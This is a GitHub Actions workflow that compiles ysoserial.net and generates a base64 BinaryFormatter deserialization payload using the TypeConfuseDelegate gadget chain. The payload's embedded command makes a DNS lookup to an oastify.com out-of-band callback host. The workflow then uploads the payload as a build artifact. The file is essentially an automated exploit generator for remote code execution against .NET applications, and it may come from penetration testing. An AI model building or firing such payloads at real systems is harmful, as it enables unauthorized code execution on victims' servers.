name: Build ysoserial.net Payload

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Checkout ysoserial.net
        uses: actions/checkout@v2

      - name: Setup MSBuild
        uses: microsoft/setup-msbuild@v1.1

      - name: Build ysoserial.net
        run: msbuild ysoserial.sln /p:Configuration=Release

      - name: Generate Payload
        run: |
          .\ysoserial\bin\Release\ysoserial.exe ^
            -g TypeConfuseDelegate ^
            -f BinaryFormatter ^
            -o base64 ^
            -c "nslookup h6okq9snf7qbxu2fz1zwbazvum0ho9cy.oastify.com" > payload.txt

      - name: Upload Payload Artifact
        uses: actions/upload-artifact@v3.1.3
        with:
          name: ysoserial-payload
          path: payload.txt
